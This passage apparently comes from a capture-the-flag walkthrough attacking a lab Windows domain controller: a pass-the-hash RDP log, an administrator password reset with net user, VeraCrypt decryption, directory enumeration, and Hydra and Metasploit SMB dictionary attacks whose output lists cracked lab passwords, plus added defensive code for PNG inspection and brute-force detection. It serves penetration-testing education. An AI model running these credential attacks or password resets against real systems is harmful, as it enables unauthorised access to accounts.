- MEMBLT_V2: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MEM3BLT_V2: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIDSTBLT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIPATBLT: 0 [19:05:54:973] [820544:820545] 
[INFO][com.freerdp.core.capabilities] - MULTISCRBLT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - MULTIOPAQUERECT: 1 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - FAST_INDEX: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYGON_SC: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYGON_CB: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - POLYLINE: 1 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - UNUSED23: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - FAST_GLYPH: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - ELLIPSE_SC: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - ELLIPSE_CB: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_INDEX: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WEXTTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WLONGTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - GLYPH_WLONGEXTTEXTOUT: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - UNUSED31: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - textFlags: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - orderSupportExFlags: 0x0004 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad4OctetsB: 0x00000000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopSaveSize: 0x00038400 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsC: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsD: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - textANSICodePage: 0xFDE9 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] 
- pad2OctetsE: 0x0000 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCacheV2CapabilitySet (length 36): [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - cacheFlags: 0x0003 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2: 0x00 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - numCellCaches: 0x05 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache0CellInfo: numEntries: 600 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache1CellInfo: numEntries: 600 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache2CellInfo: numEntries: 2048 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache3CellInfo: numEntries: 4096 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCache4CellInfo: numEntries: 2048 persistent: 0 [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:973] [820544:820545] [INFO][com.freerdp.core.capabilities] - PointerCapabilitySet (length 6): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorPointerFlag: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorPointerCacheSize: 0x0014 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pointerCacheSize: 0x0014 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - InputCapabilitySet (length 84) [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - inputFlags: 0x013D [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] 
- keyboardLayout: 0x00000409 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardType: 0x00000004 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardSubType: 0x00000000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - keyboardFunctionKey: 0x0000000C [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - BrushCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - brushSupportLevel: 0x00000002 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - GlyphCacheCapabilitySet (length 48): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache0: Entries: 254 MaximumCellSize: 4 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache1: Entries: 254 MaximumCellSize: 4 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache2: Entries: 254 MaximumCellSize: 8 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache3: Entries: 254 MaximumCellSize: 8 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache4: Entries: 254 MaximumCellSize: 16 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache5: Entries: 254 MaximumCellSize: 32 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache6: Entries: 254 MaximumCellSize: 64 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache7: Entries: 254 MaximumCellSize: 128 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache8: Entries: 254 MaximumCellSize: 256 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphCache9: Entries: 64 MaximumCellSize: 256 [19:05:54:974] [820544:820545] 
[INFO][com.freerdp.core.capabilities] - fragCache: Entries: 256 MaximumCellSize: 256 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - glyphSupportLevel: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - VirtualChannelCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - flags: 0x00000000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - VCChunkSize: 0x00000640 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - SoundCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - soundFlags: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ShareCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - nodeId: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - FontCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - fontSupportFlags: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ControlCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - controlFlags: 
0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - remoteDetachFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - controlInterest: 0x0002 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - detachInterest: 0x0002 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - ColorCacheCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - colorTableCacheSize: 0x0006 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - WindowActivationCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - helpKeyFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - helpKeyIndexFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - helpExtendedKeyFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - windowManagerKeyFlag: 0x0000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - LargePointerCapabilitySet (length 2): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - largePointerSupportFlags: 0x0001 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - MultifragmentUpdateCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - maxRequestSize: 0x0000FFFF [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 
SurfaceCommandsCapabilitySet (length 8): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - cmdFlags: 0x00000052 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - reserved: 0x00000000 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCodecsCapabilitySet (length 1): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCodecCount: 0 [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - FrameAcknowledgeCapabilitySet (length 4): [19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - frameAcknowledge: 0x00000002 [19:05:54:075] [820544:820545] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32 [19:05:54:075] [820544:820545] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16 [19:05:54:108] [820544:820545] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem [19:05:54:109] [820544:820545] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd [19:05:55:686] [820544:820545] [INFO][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex resetting error state [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - generalFlags (0x0000001E) { [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_USE_LONG_FORMAT_NAMES [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_STREAM_FILECLIP_ENABLED [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_FILECLIP_NO_FILE_PATHS [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - CB_CAN_LOCK_CLIPDATA [19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - }
If everything is correct and the pass-the-hash attack works on the host, we should see a FreeRDP window pop up, like the one below.

Changing password
Since we have a command shell with sufficient privileges to change the administrator's password, a single command is all it takes. To change the administrator's password, issue the net user Administrator enter-your-password-here command, as shown below.
C:\Windows\system32>net user Administrator password1
net user Administrator password1
The command completed successfully.
RDP access via password change
We should have access to the desktop environment with this password change. To access the desktop environment, we can use RDP since we see port 3389 (ms-wbt-server) is open.
andrew@kali:~$ rdesktop 172.20.20.37
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
Upon connecting, we see a familiar Windows login screen. In this case, we have to select the "Other user" option and enter SCOVILLE\Administrator as the username and password1 as the password. You may ask why I did not pick the first button, since it would have done the same thing. Unfortunately, in this case, it was asking for a smart card.

As you can see, the password change worked, and we have access to the desktop environment now.

VeraCrypt
Since we can see the VeraCrypt shortcut on the desktop, we can launch it to get the flag for our CTF event.

It is empty, so we need to figure out where the encrypted data is. Since there is only one hard disk on this host, I started at the root directory and noticed a DATA folder with some files in it.

Upon reading the README.txt file, it confirmed that the VAULT file is the encrypted research data. We will use this as our input file and the flag from the previous host as the decryption key.

When I used the flag from the previous question, I received an error message. I then decided to input the other key, which is as32.cowboy-quad-powder-solidify. That password worked, as you can see from the screenshot below.

Now that we have successfully decrypted the data, we can finally get the flag. It looks like all we need to do is open the FLAG.txt file, and we will get the flag.

As suspected, the flag is in the text file.

Flag
#8c1515
From the CTF perspective, we have completed the mission. But, from a penetration testing perspective, we are far from being done.
Other attacks
If this host were not vulnerable to EternalBlue, what else could we use to attack it? Going back to the Nmap results, we can see that HTTP is running on this host.
Let's inspect the site to see if there is something useful there. Since we like command-line utilities, we will use the curl command to view the site's content.
andrew@kali:~$ curl http://172.20.20.37
<head>
</head>
<body>
<h2>
Scoville Lab Informatics Platform -- Under Construction!<br><br>
Please contact our administrators if you have any questions:<br><br>
jace.le<br><br>
fern.scott<br><br>
</H2>
<img src="Capsaicin_3D.png"><br><br>
Photo courtesy: https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/F34GVS
</body>
</html>
From a CTF perspective, we should inspect the image file to see if there is something we can use. So we will download the image file and look at the strings command's output.
andrew@kali:~$ wget -q http://172.20.20.37/Capsaicin_3D.png ; strings Capsaicin_3D.png -n 10
3:aahqHa Y rq/i@mahq8 v'.ahqHa$u' aC#+0lhh`04< ($$lPhH8A!! $BPHHhP8!A r: '($$lPHH 6($$,PD !@ /8'sD&6z9l J/$lPhH0($$(; J/$lPhH8AQ 1H ECEP0H P0H ECEP0H ECQL4 ECEP0H EC R8PP0H ECEP0H ECEP0H R8PP0H ECEP0H ECQLd@ P0H ECEP0H P0H ECEP0H SVVVVVVVVM Ar9me= S@ +pHs0HH(5{ -i( JD I uy, 5S"FI*T:0 Pm:c5D+U5T :gT<4wT
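The strings output above only shows printable runs inside the compressed image data, which is why it looks like noise. A quicker structural check on a PNG is to walk its chunk list and look at the things strings cannot show: the chunk sequence, any text chunks, CRC mismatches (a sign the bytes were edited after the fact) and any data appended after the IEND chunk, the usual place for an embedded archive or payload. The following is an added example written for this article, not code from the original walkthrough; it builds its own 1x1 sample PNG instead of reading Capsaicin_3D.png, so it runs offline, and the inspect_png function can be pointed at any file's bytes.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, body):
    """Serialise one PNG chunk: 4-byte length, 4-byte type, data, CRC-32 over type+data."""
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))


def build_sample_png(trailing=b""):
    """Constructed 1x1 RGB PNG with one tEXt chunk (a sample, not the page's
    Capsaicin_3D.png).  `trailing` is appended after IEND to simulate data
    hidden past the end of the image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8 bits/sample, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter byte 0 + one red pixel
    text = b"Comment\x00constructed sample image"
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailing)


def inspect_png(data):
    """Walk the chunk list and report chunk sequence, decoded text chunks,
    CRC mismatches, truncation and any bytes that follow IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    report = {"chunks": [], "text": [], "crc_errors": [], "trailing": b"", "truncated": False}
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        stored_crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(stored_crc) < 4:
            report["truncated"] = True            # file ends in the middle of a chunk
            break
        name = ctype.decode("latin-1")
        report["chunks"].append((name, length))
        if struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF) != stored_crc:
            report["crc_errors"].append(name)     # chunk bytes changed after the CRC was written
        if ctype == b"tEXt":
            key, _, value = body.partition(b"\x00")
            report["text"].append((key.decode("latin-1"), value.decode("latin-1", "replace")))
        elif ctype == b"zTXt":
            key, _, rest = body.partition(b"\x00")   # rest[0] is the compression method
            try:
                value = zlib.decompress(rest[1:]).decode("latin-1", "replace")
            except zlib.error:
                value = "<undecodable>"
            report["text"].append((key.decode("latin-1"), value))
        pos += 12 + length
        if ctype == b"IEND":
            report["trailing"] = data[pos:]       # nothing legitimate belongs after IEND
            break
    else:
        report["truncated"] = True                # ran out of data before reaching IEND
    return report


if __name__ == "__main__":
    sample = build_sample_png(trailing=b"appended data (constructed)")
    r = inspect_png(sample)
    print("chunks:", [n for n, _ in r["chunks"]])
    print("text chunks:", r["text"])
    print("crc errors:", r["crc_errors"], "truncated:", r["truncated"])
    print("bytes after IEND:", len(r["trailing"]))
```

To use it on a downloaded file, pass open(path, "rb").read() to inspect_png; a non-empty trailing field or a CRC error on an ancillary chunk is worth a closer look, while a clean report does not rule out steganography inside the pixel data itself.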
While there are other ways to inspect image files for steganography, we will ignore that for now. We should, however, scan for hidden directories. I covered this technique in the first article of the series. I prefer gobuster to any other tool out there, so we will use it again.
andrew@kali:~$ gobuster dir -u http://172.20.20.37 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.20.20.37
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/16 16:56:37 Starting gobuster in directory enumeration mode
===============================================================
/users                (Status: 301) [Size: 149] [--> http://172.20.20.37/users/]
===============================================================
2021/12/16 16:56:51 Finished
===============================================================
The gobuster output reveals a directory called users. Let's view the page and see what is in there.
andrew@kali:~$ curl http://172.20.20.37/users/
<html><head><title>172.20.20.37 - /users/</title></head><body><H1>172.20.20.37 - /users/</H1><hr>
<pre><A HREF="/">[To Parent Directory]</A><br><br>
10/7/2020  1:44 PM          151 <A HREF="/users/users.txt">users.txt</A><br></pre><hr></body></html>
It looks like a list of users we can use in our Windows AD attack. We will save it to a text file and use it as our user wordlist.
andrew@kali:~$ curl http://172.20.20.37/users/users.txt
# list of current lab members
jace.le
fern.scott
summer.sloan
darcy.roman
troy.yates
eve.barr
max.clark
sally.bird
max.clark
yoder.mullins
The command below shows how to save the output to a file. Additionally, I added the cat command to verify that we have what we need.
andrew@kali:~$ curl http://172.20.20.37/users/users.txt -s | grep -v "#" > users.txt ; cat users.txt
jace.le
fern.scott
summer.sloan
darcy.roman
troy.yates
eve.barr
max.clark
sally.bird
max.clark
yoder.mullins
SMB dictionary attack
We are now ready to perform an SMB dictionary attack on the Windows domain controller. Unfortunately, Hydra reduces the number of parallel tasks to one for SMB connections, so it will take a long time to finish.
From a CTF perspective, it may not be ideal to wait for Hydra to complete. From a penetration testing perspective, it is no longer a viable method of gaining access, because many system administrators configure account lockout policies. A dictionary attack against every account would lock users out and result in many calls from them.
Luckily, from an attacker's perspective, we found jace.le's password within a minute of running Hydra. Since we only need one account to access the desktop via RDP, we can cancel the dictionary attack process.
andrew@kali:~$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb://172.20.20.37
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 19:33:04
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 143443990 login tries (l:/p:14344399), ~143443990 tries per task
[DATA] attacking smb://172.20.20.37:445/
[445][smb] host: 172.20.20.37   login: jace.le   password: nikita
[STATUS] 14347417.00 tries/min, 14347417 tries in 00:01h, 129096573 to do in 00:09h, 1 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Alternatively, we can use a smaller wordlist for the dictionary attack. In this case, we will use JtR's default wordlist. With this wordlist, we recovered eight of the nine accounts' passwords in less than five minutes.
andrew@kali:~$ hydra -L users.txt -P /usr/share/john/password.lst smb://172.20.20.37
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 23:16:59
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 35590 login tries (l:10/p:3559), ~35590 tries per task
[DATA] attacking smb://172.20.20.37:445/
[445][smb] host: 172.20.20.37   login: jace.le   password: nikita
[STATUS] 6291.00 tries/min, 6291 tries in 00:01h, 29299 to do in 00:05h, 1 active
[445][smb] host: 172.20.20.37   login: summer.sloan   password: butterfly
[445][smb] host: 172.20.20.37   login: darcy.roman   password: spongebob
[445][smb] host: 172.20.20.37   login: troy.yates   password: tinkerbell
[445][smb] host: 172.20.20.37   login: eve.barr   password: dolphins
[STATUS] 7415.00 tries/min, 22245 tries in 00:03h, 13345 to do in 00:02h, 1 active
[445][smb] host: 172.20.20.37   login: max.clark   password: asdfghjkl
[445][smb] host: 172.20.20.37   login: sally.bird   password: popcorn
[445][smb] host: 172.20.20.37   login: yoder.mullins   password: margarita
1 of 1 target successfully completed, 8 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 23:20:54
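Both of the Hydra runs above, and the net user Administrator password change earlier in this article, are loud on the domain controller's side: every failed SMB logon is a Security event 4625 with the source address, a lockout policy produces 4740 when it trips, and resetting another account's password produces 4724. The block below is an added example written for this article (not code from the original walkthrough or from any tool it uses) showing the detection logic a blue team would run over such events. It is run over a constructed export rather than a real log; the export format, the source address 172.20.20.99 and the thresholds are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample export of Windows Security events from a domain controller
# (not a log from the page's lab).  Fields: UTC timestamp, event id, target
# account, source address.  4625 = failed logon, 4740 = account locked out,
# 4724 = an account's password was reset by another principal.
# 172.20.20.99 is a hypothetical attacker address; 172.20.20.35 is a host where
# a user simply mistyped a password twice.
SAMPLE_EVENTS = """\
2021-12-16T19:10:02Z 4724 Administrator -
2021-12-16T19:31:10Z 4625 fern.scott 172.20.20.35
2021-12-16T19:31:14Z 4625 fern.scott 172.20.20.35
2021-12-16T19:33:04Z 4625 jace.le 172.20.20.99
2021-12-16T19:33:05Z 4625 jace.le 172.20.20.99
2021-12-16T19:33:05Z 4625 jace.le 172.20.20.99
2021-12-16T19:33:06Z 4625 fern.scott 172.20.20.99
2021-12-16T19:33:06Z 4625 fern.scott 172.20.20.99
2021-12-16T19:33:07Z 4625 summer.sloan 172.20.20.99
2021-12-16T19:33:07Z 4625 summer.sloan 172.20.20.99
2021-12-16T19:33:08Z 4625 darcy.roman 172.20.20.99
2021-12-16T19:33:08Z 4625 darcy.roman 172.20.20.99
2021-12-16T19:33:09Z 4625 troy.yates 172.20.20.99
2021-12-16T19:33:09Z 4625 troy.yates 172.20.20.99
2021-12-16T19:33:10Z 4625 eve.barr 172.20.20.99
2021-12-16T19:33:12Z 4740 jace.le -
"""


def parse_events(text):
    """Turn the export into sorted (timestamp, event id, account, source) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, eid, user, src = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), int(eid), user.lower(), src))
    return sorted(events)


def detect_guessing(events, window=timedelta(minutes=5), min_failures=10, min_accounts=3):
    """Flag every source whose failed logons inside a sliding `window` reach
    `min_failures`; classify by how many distinct accounts it touched.
    Returns (alerts by source, lockouts, password resets)."""
    recent = defaultdict(deque)          # source -> (ts, account) failures still in the window
    alerts, lockouts, resets = {}, [], []
    for ts, eid, user, src in events:
        if eid == 4740:
            lockouts.append((ts, user))
        elif eid == 4724:
            resets.append((ts, user))
        elif eid == 4625:
            q = recent[src]
            q.append((ts, user))
            while ts - q[0][0] > window:     # expire failures older than the window
                q.popleft()
            accounts = sorted({u for _, u in q})
            if len(q) >= min_failures:
                kind = ("dictionary attack across accounts" if len(accounts) >= min_accounts
                        else "brute force on one account")
                alerts[src] = {"kind": kind, "failures": len(q), "accounts": accounts,
                               "window_start": q[0][0], "last_seen": ts}
    return alerts, lockouts, resets


def run_sample():
    return detect_guessing(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    alerts, lockouts, resets = run_sample()
    for src, a in alerts.items():
        print(f"{src}: {a['kind']}, {a['failures']} failures against {len(a['accounts'])} "
              f"accounts between {a['window_start']:%H:%M:%S} and {a['last_seen']:%H:%M:%S}")
    for ts, user in lockouts:
        print(f"{ts:%H:%M:%S} account locked out: {user}")
    for ts, user in resets:
        print(f"{ts:%H:%M:%S} password reset for: {user}")
```

The two mistyped logons from 172.20.20.35 never reach the threshold, while the single-task Hydra run is flagged on its tenth failure and stays flagged as the window fills. The 4740 and 4724 events are reported separately because each is worth an alert on its own: a lockout on a domain controller confirms the policy the text mentions is in place, and a reset of the built-in Administrator account is exactly what the earlier net user command produces.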
Metasploit SMB login scanner
Alternatively, we can use the SMB login scanner module in Metasploit. This auxiliary module is slower than Hydra, but it has its advantages, one being that it can stop the run as soon as it detects an account lockout (the ABORT_ON_LOCKOUT option). Either way, check the domain's lockout threshold before spraying a long wordlist at real accounts. If speed is all you want, use Hydra.
Since there is a duplicate in our original user file, we can massage that a little bit to get rid of it.
andrew@kali:~$ curl -s http://172.20.20.37/users/users.txt | grep -v "#" | sort | uniq > users.txt ; cat users.txt
darcy.roman
eve.barr
fern.scott
jace.le
max.clark
sally.bird
summer.sloan
troy.yates
yoder.mullins
We are ready to run Metasploit and use the SMB login scanner module. As usual, we need to set the options before we run any Metasploit module.
andrew@kali:~$ msfconsole -q
msf6 > search auxiliary smb login

Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                                 normal  No     SMB Login Check Scanner
   1  auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                   normal  No     SMB NTLMv1 Login Request Corruption

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt

msf6 > use 0
msf6 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT              445              yes       The SMB service port (TCP)
